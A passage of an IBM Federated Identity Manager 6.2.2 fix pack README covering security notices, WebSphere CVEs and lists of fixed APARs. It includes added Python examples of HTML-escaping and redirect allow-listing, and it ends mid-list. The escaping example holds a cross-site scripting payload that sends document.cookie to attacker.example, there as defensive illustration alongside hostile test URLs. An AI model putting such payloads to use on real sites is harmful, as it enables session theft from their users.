IBM® Tivoli® Federated Identity Manager,
Fix Pack 6.2.2-TIV-TFIM-FP0018 README
©Copyright International Business Machines Corporation 2008, 2017.
All rights reserved. U.S. Government Users Restricted Rights
-- Use, duplication or disclosure restricted by GSA ADP Schedule
Contract with IBM Corp.
NOTE: Before using this information and the product it supports,
read the general information under the Notices
section of this document.
Date: Thursday, 19 April 2018
=====================================================================================================
Contents
- ABOUT THIS PATCH
- ADDITIONAL CERTIFICATION INFORMATION
- APARS AND DEFECTS FIXED
- BEFORE INSTALLING THIS PATCH
- INSTALLING THIS PATCH
- BEFORE UNINSTALLING THIS PATCH
- UNINSTALLING THIS PATCH
- DOCUMENTATION UPDATES
- SOFTWARE LIMITATIONS
- KNOWN ISSUES AND WORKAROUNDS
- NOTICES
=====================================================================================================
About the fix pack
This fix pack corrects problems in IBM Tivoli Federated
Identity Manager (Federated Identity Manager) and IBM Tivoli Federated
Identity Manager Business Gateway (Federated Identity Manager Business
Gateway), Version 6.2.2. It requires that Federated Identity Manager or
Federated Identity Manager Business Gateway, Version 6.2.2, be installed.
After installing this fix pack, your Federated Identity
Manager or Federated Identity Manager Business Gateway installation
will be at the 6.2.2-TIV-TFIM-FP0018 level.
IMPORTANT NOTICE
Potential cross-site scripting vulnerability via macros in event page template files
Some IBM Tivoli Federated Identity Manager page macros might be vulnerable to cross-site scripting attacks when their values are not properly encoded. Contact IBM Support for the list of macros that might be subject to this issue. To remediate this, add the macros provided by IBM Support to the comma-separated list of tokens in the runtime custom property SPS.PageFactory.HtmlEscapedTokens, so that their values are HTML-escaped when the template files are rendered. For example, if the list of macros provided is:
- @EXAMPLE_MACRO1@
- @EXAMPLE_MACRO2@
- @EXAMPLE_MACRO3@
the value of the runtime custom property SPS.PageFactory.HtmlEscapedTokens
with the above macros added can be:
@REQ_ADDR@,@DETAIL@,@EXCEPTION_STACK@,@EXCEPTION_MSG@,@RESPONSE@,@TARGET@,@DETAIL@,@SAMLSTATUS@,@EXAMPLE_MACRO1@,@EXAMPLE_MACRO2@,@EXAMPLE_MACRO3@
NOTE: Other macros that are prone to cross-site scripting can also be added to SPS.PageFactory.HtmlEscapedTokens. The value of this runtime custom property will be revised periodically and updated as needed. For more information about the runtime custom property, see Custom properties for single sign-on protocol service.
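The following Python model, added here as an illustration and not taken from the product's PageFactory code, shows why the property matters: a macro whose value is inserted verbatim lets attacker-controlled text become markup, while the same macro listed in SPS.PageFactory.HtmlEscapedTokens is neutralised. The template fragment, the attack values and the handling of macros that have no value are constructed for this example; the @EXAMPLE_MACRO*@ names are the README's placeholders, not real macros.

```python
"""Macro substitution with an HtmlEscapedTokens allow-list.  Added example; it is
not TFIM's PageFactory code, only a model of the behaviour the notice describes."""
import html
import re

# Default value of SPS.PageFactory.HtmlEscapedTokens as quoted in this README.
DEFAULT_TOKENS = ("@REQ_ADDR@,@DETAIL@,@EXCEPTION_STACK@,@EXCEPTION_MSG@,"
                  "@RESPONSE@,@TARGET@,@DETAIL@,@SAMLSTATUS@")
# The same list with the README's placeholder macro names appended.
HARDENED_TOKENS = DEFAULT_TOKENS + ",@EXAMPLE_MACRO1@,@EXAMPLE_MACRO2@,@EXAMPLE_MACRO3@"

MACRO_RE = re.compile(r"@[A-Z0-9_]+@")


def parse_escaped_tokens(value):
    """Turn the comma-separated property value into a set of macro names
    (duplicates such as the second @DETAIL@ collapse harmlessly)."""
    return {tok.strip() for tok in value.split(",") if tok.strip()}


def render_page(template, values, escaped_tokens):
    """Replace every @MACRO@ in template with its value.  Macros named in
    escaped_tokens are HTML-escaped first; all others are inserted verbatim,
    which is the exposure the notice warns about.  Macros with no value are
    left in place (an assumption of this model, not documented behaviour)."""
    def substitute(match):
        token = match.group(0)
        if token not in values:
            return token
        text = str(values[token])
        if token in escaped_tokens:
            return html.escape(text, quote=True)
        return text
    return MACRO_RE.sub(substitute, template)


# Constructed error-page fragment and attacker-controlled macro values.
ERROR_TEMPLATE = "<p>Target: @TARGET@</p><p>Detail: @EXAMPLE_MACRO1@</p>"
ATTACK_VALUES = {
    "@TARGET@": "/protected/app",
    "@EXAMPLE_MACRO1@": '<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
}


def render_with(tokens_property):
    """Render the constructed page under a given HtmlEscapedTokens value."""
    return render_page(ERROR_TEMPLATE, ATTACK_VALUES, parse_escaped_tokens(tokens_property))


if __name__ == "__main__":
    print("default :", render_with(DEFAULT_TOKENS))    # script tag survives
    print("hardened:", render_with(HARDENED_TOKENS))   # &lt;script&gt; only
```

HTML escaping is the right encoding for a macro that lands in HTML body or attribute-value context. A macro that is expanded inside a script block or a javascript: URL in a customised template needs JavaScript or URL encoding instead, which this property does not provide; check where each macro is used in your page templates before relying on the list alone.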
Possible security exposure with IBM WebSphere Application Server with WS-Security enabled applications using LTPA tokens (CVE-2011-1377)
The security that IBM WebSphere Application Server provides might be weaker than expected when web services security (WS-Security) is used. A user might randomly gain elevated privileges on the provider system: after authentication, WS-Security might assign the identity of a previously processed LTPA token to a new inbound LTPA token. This affects applications using either JAX-WS or JAX-RPC.
Versions affected:
- IBM WebSphere Application Server, all platforms, Versions 8.0 through 8.0.0.2, 7.0 through 7.0.0.21, and 6.1 through 6.1.0.41, 6.0.2 through 6.0.2.43.
- IBM WebSphere Application Server Feature Pack for Web Services Versions 6.1.0.9 through 6.1.0.39.
The same fix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager. For more information regarding the vulnerability and the fix, access http://www.ibm.com/support/docview.wss?uid=swg21587536
Use the IBM WebSphere Update Installer (WUI) to apply the fix. If the WUI has not been previously installed, the WUI can be downloaded from http://www.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.
Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server as soon as possible. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed fix installation instructions.
Denial of Service Security Exposure with Java JRE/JDK hanging when converting 2.2250738585072012e-308 number (CVE-2010-4476)
This security alert addresses a serious security issue: CVE-2010-4476 (Java Runtime Environment hangs when converting "2.2250738585072012e-308" to a binary floating-point number). This vulnerability might cause the Java Runtime Environment to hang, go into an infinite loop, and/or crash resulting in a denial of service exposure. The JRE might hang if the number is written without scientific notation (324 decimal places). In addition to the Application Server being exposed to this attack, any Java program using the Double.parseDouble method is also at risk of this exposure including any customer written application or third party written application.
The following products contain affected versions of the Java Runtime Environment:
- IBM WebSphere Application Server Versions 7.0 through 7.0.0.13 for Distributed, i5/OS and z/OS operating systems.
- IBM WebSphere Application Server Versions 6.1 through 6.1.0.35 for Distributed, i5/OS and z/OS operating systems.
- IBM WebSphere Application Server Versions 6.0 through 6.0.2.43 for Distributed, i5/OS and z/OS operating systems.
The same iFix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager. For more information regarding the vulnerability and the iFix access http://www.ibm.com/support/docview.wss?uid=swg21462019
Use the IBM WebSphere Update Installer (WUI) to apply the fix. If the WUI has not been previously installed, the WUI can be downloaded from http://www.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.
Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server as soon as possible. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed iFix installation instructions.
java.lang.RuntimeException: SRV.8.2: RequestWrapper objects must extend ServletRequestWrapper or HttpServletRequestWrapper (PM10357)
APAR PM10357 is reported against WebSphere Application Server (WAS) v6.1. Because of the defect it describes, operations in the IBM Tivoli Federated Identity Manager Management Console can fail with the following exception in the log when the Management Console is deployed on an affected version of WAS v6.1:
java.lang.RuntimeException: SRV.8.2: RequestWrapper objects must extend ServletRequestWrapper or HttpServletRequestWrapper
Examples of operations that can fail include:
- Importing a keystore file
- Loading a mapping rule
Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed iFix installation instructions.
The same fix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager.
The IBM WebSphere Update Installer (WUI) must be used to apply the fix. If the WUI has not been previously installed, download the WUI from
http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.
IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway can be affected by vulnerabilities in the Websphere IBM Java Runtime Environment (CVE-2013-2407)
An unspecified vulnerability in the WebSphere IBM Java Runtime Environment (JRE) component allows remote attackers to affect the confidentiality and availability of Tivoli Federated Identity Manager (TFIM) and IBM Tivoli Federated Identity Manager Business Gateway (TFIMBG) via unknown vectors related to Libraries.
The following products contain affected versions of the Java Runtime Environment:
- IBM WebSphere Application Server Versions 7.0 through 7.0.0.29 for Distributed, i5/OS and z/OS operating systems.
- IBM WebSphere Application Server Versions 6.1 through 6.1.0.45 for Distributed, i5/OS and z/OS operating systems.
The same iFix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager. For more information regarding the vulnerability and the iFix access http://www-01.ibm.com/support/docview.wss?uid=swg21644157
Use the IBM WebSphere Update Installer (WUI) to apply the fix. If the WUI has not been previously installed, the WUI can be downloaded from http://www.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.
Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server as soon as possible. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed iFix installation instructions.
Fix pack contents and distribution
This fix pack package contains:
- The fix pack zip file.
- This README.
This fix pack is distributed as an electronic download
from the IBM Support Web site.
Architecture
This fix pack package supports the same operating
system releases that are listed under Operating systems for a specific product for Tivoli Federated Identity Manager version 6.2.2.
This fix pack package supports the same software prerequisites that are listed under Prerequisites of a specific product for Tivoli Federated Identity Manager version 6.2.2.
The software requirements of the Tivoli Federated Identity Manager risk-based access feature are documented separately. Since 6.2.2-TIV-TFIM-FP0004, the list of supported databases also includes:
- Oracle Database 10g Standard/Enterprise Editions Release 4 and future fix packs
- Oracle Database 11g Standard/Enterprise Editions Release 1 and future fix packs.
Fix packs superseded by this fix pack
6.2.2-TIV-TFIM-FP0017
6.2.2-TIV-TFIM-FP0016
6.2.2-TIV-TFIM-FP0015
6.2.2-TIV-TFIM-FP0014
6.2.2-TIV-TFIM-IF0013
6.2.2-TIV-TFIM-FP0012
6.2.2-TIV-TFIM-IF0011
6.2.2-TIV-TFIM-FP0010
6.2.2-TIV-TFIM-FP0009
6.2.2-TIV-TFIM-FP0007
6.2.2-TIV-TFIM-FP0006
6.2.2-TIV-TFIM-LA0005
6.2.2-TIV-TFIM-FP0004
6.2.2-TIV-TFIM-FP0002
Federated Identity Manager consists of the following components
that can be installed separately:
- Administration console
- Management service and runtime component
- Web services security management (WSSM)
- WS-provisioning runtime
- Internet information services (IIS) Web plug-in
- Apache/IBM HTTP Server Web plug-in
- IBM Support Assistant plugin
- Risk-based access
This fix pack applies only to the administration
console, the management service and runtime component, Web Services
Security Management (the first three components listed above), the Web
plug-ins (Internet Information Services and Apache/IBM HTTP Server)
and the risk-based access component. These components must be at the
same level. For example, if you install a fix pack for the management
service and runtime component, you must install the corresponding fix
packs for the administration console and WSSM components. If these
components are not all at the same fix pack level, they are not
guaranteed to interoperate with each other as designed.
APARs and defects fixed
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0018
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV96485
SYMPTOM: TFIM 6.2.2.16 throwing classnotfound when using SSL to LDAP with alias service
IV97422
SYMPTOM: PAC Header is URL Encoded after applying FP17
IV92373
SYMPTOM: TFIM JDBC Alias look up error
IV98490
SYMPTOM: TFIM 6.2.2.17 SETS FIM COOKIE SECURE EVEN THOUGH ACCESS IS HTTP
IJ04891
SYMPTOM: TFIM is affected by a Security Assertion Markup Language (SAML)-based single sign-on (SSO) systems vulnerability
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0017
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV60437
SYMPTOM: TFIM CONFIG IMPORT DOES NOT UPGRADE ALL FEDERATION AND PARTNERS CORRECTLY IN SOME CASES
IV78421
SYMPTOM: DELETING A CUSTOM MODULE INSTANCE SHOULD REMOVE ALL FEDERATION/PARTNER REFERENCES TO THE MODULE
IV79973
SYMPTOM: NEED PROVIDER ID BE NON-URL
IV80448
SYMPTOM: CTGDIS197E CONFIG INSTANCE WITH NAME 'TXXXXX' IS ALREADY RUNNING
IV81200
SYMPTOM: LDAP TIMEOUT PARAMETER DURING ALIAS LOOKUP
IV81201
SYMPTOM: IMPROVES PERFORMANCE OF BASIC LDAP USER SERVER SELECTION DURING ALIAS LOOKUP
IV82233
SYMPTOM: DELETE PARTNER MAPPING RULE DOES NOT CLEAR MAPPING RULE TYPE
IV81312
SYMPTOM: STSUUSER PRINCIPAL DOES NOT MATCH INCOMING ASSERTION PERSISTENT NAMEID
IV81424
SYMPTOM: NULL POINTER ERROR WHILE IMPORTING A PARTNER
IV82619
SYMPTOM: TFIM NOT FOLLOWING SAML SPEC WHEN AUTHN REQUEST SENT WITH FORCEAUTHN=TRUE
IV83053
SYMPTOM: SAML20.INCLUDEINCLUSIVENAMESPACES IN CUSTOM PROPERTIES IGNORED WHEN NOT ALL OUTGOING SAML MESSAGES AND ASSERTIONS SIGNED
IV83141
SYMPTOM: TFIM SIGNED SAML ASSERTIONS CAUSE DIGEST VALUE CALCULATION PROBLEMS
IV83602
SYMPTOM: FIM URL ENCODING HEADER VALUES IS CAUSING ISSUES FOR BACKEND APPLICATIONS
IV84171
SYMPTOM: RELAY STATE IS SET TO NULL WHEN TARGET URL IS NULL
IV85111
SYMPTOM: SPACE IN FIM ATTRIBUTES ARE CONVERTED TO + CHARACTER
IV90210
SYMPTOM: PROBLEM WITH O365 AFTER APPLYING TFIM 6.2.2.16
IV90763
SYMPTOM: TFIM 6.2.2.16 JVMS MAY HANG WHEN SHUTTING DOWN SERVERS
IV91232
SYMPTOM: DISTRIBUTEDMAP CUSTOM RUNTIME PARAMETERS CAUSE DELAY DURING AUTHENTICATION
IV91644
SYMPTOM: CANNOT UPDATE USC PROFILE.HTML WITHOUT UPDATING SECRET QUESTIONS
IV91645
SYMPTOM: TFIM SESSION LIFETIME HAS A MAX OF 24.8 DAYS
IV93047
SYMPTOM: SET DEFAULT VALUE FOR SOAPACTION HEADER
IV95727
SYMPTOM: XML External Entity Injection Vulnerability
IV95729
SYMPTOM: Cross-site Scripting Vulnerability
IV95733
SYMPTOM: Missing Attribute in Encrypted Session Cookie
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0016
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV73515
SYMPTOM: THE RTSS CONNECTION FROM RBA ONLY ALLOWS HTTP TRAFFIC
IV74285
SYMPTOM: XML EXTERNAL ENTITY INJECTION VULNERABILITY
IV77590
SYMPTOM: THE RBA MAX_VALUE COLUMN DOES NOT ALLOW A VALUE MORE THAN 2 BILLION
IV77587
SYMPTOM: DEADLOCKS OCCUR IN THE RBA SESSION TABLES (See the documentation updates for APAR IV77587)
IV77588
SYMPTOM: PREVENT DEADLOCKS IN THE RBA SESSION TABLES (See the documentation updates for APAR IV77588)
IV77597
SYMPTOM: UPDATED PRE-INSTALLATION INSTRUCTIONS (See the documentation updates for APAR IV77597)
IV77558
SYMPTOM: TFIM 6.2.2 is vulnerable to cross-site scripting attack
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0015
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV74198
SYMPTOM: SECURITY UPDATE
IV72000
SYMPTOM: API DOCUMENTATION AVAILABLE FOR IDMAPPINGEXTUTILS
IV72559
SYMPTOM: INABILITY TO INSERT SUBJECT ELEMENT INTO SAML2 AUTHNREQUEST
IV63024
SYMPTOM: TAM CONF FILE AND KS NOT UPDATED IN DMGR CONFIG REPOSITORY WHEN API AUTO-REFRESHES
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0014
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV66435
SYMPTOM: UNDEFINED PAGE ERROR WHEN USING INVALID CHARS FOR USC SECRET QUESTION ANSWER
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0012
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV62299
SYMPTOM: UNDEFINED PAGE ERROR WHEN USING INVALID CHARS FOR USC SECRET QUESTION ANSWER
IV63149
SYMPTOM: STABILITY FIX FOR TFIM MANAGEMENT SERVICE
IV63877
SYMPTOM: PROVIDERID UPDATE TO A NON-URL VALUE LEADS TO CONFIG CORRUPTION
IV64327
SYMPTOM: TFIMCFG.JAR CANNOT HANDLE MORE THAN 1024 CHARS OF OUTPUT WITH WGACONFIG
IV64967
SYMPTOM: INCORRECT RISK SCORE BEING RETURNED BY RISK ENGINE
IV65893
SYMPTOM: DISTRIBUTED MAP DEFAULT RETRY LIMIT/DELAY NOT SET
IV65894
SYMPTOM: INCORRECT OPENID ID URL USED FOR CUSTOM ID GENERATOR
Problems fixed by interim fix 6.2.2-TIV-TFIM-IF0011
The following problems are corrected by this interim fix.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV64324
SYMPTOM: Improving the robustness of URL validation in OAuth2 workflow.
IV64325
SYMPTOM: Adds a new custom runtime property named
'redirecturl.validation.enabled'. It is set to true for FIM domains
created after this interim fix (or any later fix pack) is installed, and
to false for FIM domains that existed before. When it is set to true, the
URL redirection covered by APARs IV64349, IV64376 and IV64494 is
restricted to the allowed URLs specified. (See the documentation updates for APAR IV64325)
IV64349
SYMPTOM: Allows specifying, at the SAML 1.1 and SAML 2.0 federation and
partner level, the URLs that the SAML 1.1 and SAML 2.0 Service Provider
SSO profile can redirect to. The common domain cookie reading and writing
service in the SAML 2.0 Identity Provider Discovery Profile is not
included in this APAR; it is covered by the earlier APAR IV50637. (See
the documentation updates for APAR IV64349)
IV64376
SYMPTOM: Allows specifying, at the federation level, the URLs that
OpenID SSO can redirect to. (See the documentation updates for APAR
IV64376)
IV64494
SYMPTOM: Specifying URLs that the authentication service can redirect to. (See the documentation updates for APAR IV64494)
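The APARs above all add the same control: a redirect target supplied in a request (a SAML RelayState or target, an OpenID return URL, an authentication-service target) is only followed if it is on a configured allow-list, and the control is switched on by redirecturl.validation.enabled. The Python below is an added example of such a check and is not TFIM's implementation; the allowed-URL syntax it assumes (an entry ending in "/" is a path prefix, any other entry must match exactly) and the validation_enabled flag standing in for the runtime property are assumptions of this example, and the allow-list and candidate URLs are constructed.

```python
"""Allow-list check for redirect targets.  Added example, not TFIM code.
Assumed entry syntax: a trailing "/" means "this path and everything under it";
any other entry must match the candidate's path exactly."""
import posixpath
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed allow-list, as it might be configured for one partner.
EXAMPLE_ALLOWED_URLS = [
    "https://sp.example.com/app/",            # prefix entry
    "https://portal.example.com/landing",     # exact entry
]


def _origin(parts):
    """Return (scheme, host, port) with default ports filled in, or None if the
    URL has no usable origin.  Rejects relative URLs, javascript:/data: schemes,
    and the userinfo trick (https://good.example@evil.example/)."""
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname or "@" in parts.netloc:
        return None
    try:
        port = parts.port                     # raises ValueError on "https://h:abc/"
    except ValueError:
        return None
    return (scheme, parts.hostname, port or DEFAULT_PORTS[scheme])


def _canon_path(path):
    """Collapse dot segments so /app/../admin cannot pass an /app/ prefix test."""
    p = posixpath.normpath(path or "/")
    return "/" + p.lstrip("/")                # normpath preserves a leading "//"


def is_allowed_redirect(candidate, allowed_urls, validation_enabled=True):
    """True if candidate may be redirected to.  With validation disabled (the
    pre-fix behaviour for existing domains) every target is accepted."""
    if not validation_enabled:
        return True
    # Control characters, whitespace and backslashes are never legitimate here
    # and are the raw material for header injection and parser confusion.
    if not candidate or any(ord(ch) < 33 for ch in candidate) or "\\" in candidate:
        return False
    try:
        cand = urlsplit(candidate)
    except ValueError:
        return False
    cand_origin = _origin(cand)
    if cand_origin is None:
        return False
    cand_path = _canon_path(cand.path)
    for entry in allowed_urls:
        ent = urlsplit(entry)
        if _origin(ent) != cand_origin:       # scheme, host and port must all match
            continue
        ent_path = _canon_path(ent.path)
        if entry.endswith("/"):               # prefix entry
            if cand_path == ent_path or cand_path.startswith(ent_path.rstrip("/") + "/"):
                return True
        elif cand_path == ent_path:           # exact entry; query string is permitted
            return True
    return False


if __name__ == "__main__":
    for url in ("https://sp.example.com/app/home?x=1",
                "https://sp.example.com.evil.net/app/",
                "https://sp.example.com@evil.net/app/",
                "https://sp.example.com/app/../admin",
                "http://sp.example.com/app/home",
                "//evil.net/app/",
                "javascript:alert(1)"):
        print(is_allowed_redirect(url, EXAMPLE_ALLOWED_URLS), url)
```

The host comparison is deliberately exact: suffix matching ("ends with example.com") is what lets sp.example.com.evil.net through, and prefix matching on the raw string is what lets the userinfo form and dot-segment traversal through. Note also that the fix leaves the property false for domains created before the interim fix, so on an upgraded deployment the check is not active until you turn it on.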
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0010
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV60999
SYMPTOM: TFIM AUDIT EVENTS DEPENDENT ON WEBSPHERE TRACING.
IV60745
SYMPTOM: INCORRECT ERROR MESSAGE IN RESPONSE TO MINIMUM NUMBER OF SECRET QUESTIONS.
IV60296
SYMPTOM: FIM OSGI BUNDLE HAS THREAD UNSAFE CLASSES.
IV60993
SYMPTOM: ALLOW CDATA IN MAPPING RULES.
IV60437
SYMPTOM: TFIM CONFIG IMPORT DOES NOT UPGRADE ALL FEDERATION AND PARTNERS CORRECTLY IN SOME CASES.
IV58675
SYMPTOM: ADDITIONAL AUDITING FOR OTP
IV58596
SYMPTOM: CUSTOM PROPERTY WSFED.IDP.RSTR.EXCLUDED.ELEMENTS ONLY WORKS WHEN TRACING IS ENABLED.
IV59510
SYMPTOM: AFTER RBA DEPLOY ERROR "AN ERROR OCCURRED WHILE EVALUATING THE 'CONDITION' OF AN XACML POLICY 'RULE' ELEMENT." MAY BE SEEN.
IV55405
SYMPTOM: ADDING INSTRUCTIONS TO SET CS ISOLATION LEVEL WITHIN THE RBA DATABASE CONFIGURATION. (See the documentation updates for APAR IV55405)
IV60252
SYMPTOM: ATTRIBUTE QUERY REQUEST IS ALWAYS VALIDATED WHEN TFIM IS AN IDP
IV59071
SYMPTOM: CAN NOT CORRECTLY CONFIGURE ATTRIBUTE QUERY
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0009
The following problems are corrected by this fix pack.
For more information about the APARs listed here, see the
Tivoli Federated Identity Manager support site.
IV52630
SYMPTOM: Uncleared access token with failed OAuth 2.0 Resource Owner Password Credentials Flow. (See the documentation updates for APAR IV52630)
IV52562
SYMPTOM: Trying to import an authentication policy javascript mapping rule to a point of contact configured "like WebSEAL" resulted in this exception in the console's log: Caused by: java.lang.NoClassDefFoundError: com.tivoli.am.fim.user.info.UserInfoProviderException
IV52617
SYMPTOM: DB2 schema creation script should prompt for password. (See the documentation updates for APAR IV52617)
IV52545
SYMPTOM: ID Mapping Utils does not provide a function to deprovision TOTP/HOTP shared secrets.
IV52618
SYMPTOM: RBA_DB has table with name KEYS which is a reserved keyword in MySQL.
IV52546
SYMPTOM: When there are more than 1 user running the RBA flow, the info.js will cause an error.
IV52624
SYMPTOM: Improve one-time enforcement of OTP.
IV52539
SYMPTOM: RTSS will return a failure when it could be returning a PERMIT.
IV52616
SYMPTOM: Upgrading to fix pack 6 or 7 from a 6.2.2 level below fix pack 4 fails with a NullPointerException.
IV52613
SYMPTOM: The CLI command manageItfimOneTimePassword with the configure operation throws the following exception: com.ibm.ws.scripting.ScriptingException: java.lang.NoClassDefFoundError: java.lang.NoClassDefFoundError: com.tivoli.am.fim.user.info.UserInfoProviderException
IV52612
SYMPTOM: TFIM UserInfoProvider database is using MySQL reserved keyword as table name.
IV50637
SYMPTOM: Specifying URLs that the common domain cookie reading and writing service in the SAML 2.0 Identity Provider Discovery Profile can redirect to. (See the documentation updates for APAR IV50637)
IV50521
SYMPTOM: When info.js is loaded more than once, the cookie ac.uuid is changed to an invalid value that contains <SCRIPT>...</SCRIPT>.
IV50087
SYMPTOM: When a trigger URL parameter is added as an attribute to an assertion within a mapping rule and the value of this parameter is a complex xml type, the value of the attribute is the parameter value that has been XML-escaped twice.
IV47214
SYMPTOM: Macro %SSOREQUEST% does not contain the exact incoming request because samlp:Extensions is removed from the request.
IV52562
SYMPTOM: Publish plugins fails in a cluster with the following exception observed in the trace log: com.tivoli.am.fim.mgmt.web.OSGiManagementImpl restart com.tivoli.am.fim.osgi.EclipseControllerException: Caught exception while trying to get this WebSphere Application Server's internal class acess mode.
IV47042
SYMPTOM: TFIM is failing to recognize a nested status code when the status code contains whitespace.
IV46807
SYMPTOM: In a SAML 2.0 federation where there are multiple SPs and user is logged into more than 1 SP, SP-initiated SLO using asynchronous binding e.g. HTTPPost fails.
IV45886
SYMPTOM: LDAP Migration Tool throws out of memory and Java networking exceptions when there are a million aliases to be migrated.
IV43834
SYMPTOM: USC displays a success page even though password change fails for forgotten password flow.
IV52563
SYMPTOM: When an alias with no certificate is present in the keystore, listing of keys fails.
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0007
IV44424
SYMPTOM: Example USC mapping rule does not validate mobile number, email, secret question answer and secret question index.
IV44425
SYMPTOM: If Redirect URI is not contained in the request to the OAuth 2.0 authorize endpoint, the default redirect URI should be read from OAUTH20.ClientRedirectUri value.
IV44426
SYMPTOM: The login button in the OTP login page should be disabled once the retry limit has been reached so that the user cannot attempt another retry which will cause exception FBTOTP313E.
IV44484
SYMPTOM: Wrong X509SKI value in digital signature.
IV44470
SYMPTOM: Unnecessary dependency on PDJRTE when configuring Web Gateway Appliance as point of contact with the tfimcfg tool.
IV44403
SYMPTOM: Attributes with colons in their names may not be specified in an XACML rules policy.
IV44405
SYMPTOM: If the policy_consent_based_registration policy is used and the user logs in on a registered device, they will be asked for consent to register again.
IV44410
SYMPTOM: If the path to a resource is different from the path to info.js, then the cookie containing the session id will not be sent when the resource is accessed. The cookie will also not be secure when using HTTPS.
IV44411
SYMPTOM: Javascript matchers based on historical user data can not be written because the historical data is not passed to the matcher.
IV44412
SYMPTOM: When RBA risk reports are enabled, traces are seen in the System.out logs.
IV43149
SYMPTOM: Risk-based access Federation First Steps Wizard does not work properly after applying TFIM 6.2.2 Fixpack 6. The panel after the panel to scan TFIM configurations is blank. After clicking next, the wizard prompts an error message.
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0006
IV37665
SYMPTOM: For modern browsers, the table rows in FIM console are misaligned.
IV37666
SYMPTOM: When using the JRE of WAS 8 and above to run tfimcfg.jar to configure a WebSEAL server, the operation fails with the following exception:
FBTTAC003E An error occurred when reading or writing the file /opt/IBM/WebSphere/AppServer/java/jre/PolicyDirector/PD.properties: java.io.FileNotFoundException: /opt/IBM/WebSphere/AppServer/java/jre/PolicyDirector/PD.properties (No such file or directory)
IV37668
SYMPTOM: When creating new point of contact using CLI, the authentication policy callbacks are incorrectly configured using the configuration of the authenticate callbacks.
IV37674
SYMPTOM: When using FFS to configure Salesforce as a SaaS, the Summary page shows: When configuring the service provider settings, you may need to supply the Federated Identity Manager Endpoint URL which is ....
IV37305
SYMPTOM: When the USC forgot password flow is triggered and the user enters a new password that does not meet the password requirements, the secret question page is redisplayed with all secret question fields set to the first question and disabled. When the user fills in all secret question answer fields and resubmits, another error is shown.
IV37675
SYMPTOM: When a user runs through the USC forgotten password flow and too many failed attempts at answering the secret questions are made, the error page is displayed using forgotid_error.html instead of forgotpassword_error.html.
IV37680
SYMPTOM: WAS JRE is not configured for TAM runtime for Java if FFS is used to create domain, deploy and configure runtime.
IV36139
SYMPTOM: In the OAuth 1.0 flow, when the Temporary Credential Request Endpoint contains a query string, the Request Temp Token call fails with a signature mismatch.
IV37707
SYMPTOM: Cannot configure FIM to use POST only in OpenID flows.
IV38333
SYMPTOM: FFS wizards complete successfully even when there are problems configuring the junctions using tfimcfg.jar.
Problems fixed by fix pack 6.2.2-TIV-TFIM-LA0005
IV36145
SYMPTOM: OTP support fixes that include outbound HTTP proxy support, OTP retry enforcement, resending of OTP, success/failure determination of SMS delivery via HTTP response body, detailed tracing for OTP SMS Provider, updates to OTP delivery and provider modules, OTP authentication policy callback mapping rule console fix and un-authenticated OTP support. (See the documentation updates for APAR IV36145)
IV36140
SYMPTOM: User Self Care session information storage. (See the documentation updates for APAR IV36140)
IV36136
SYMPTOM: Some USC module configuration is not read from config and uses the default value(s) only. One example is the 'USC.AccountRecoveryValidationAttributes' configuration.
IV36153
SYMPTOM: Null pointer exception in STSLTPATokenModule when Principal name attribute type is null.
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0004
IV31640
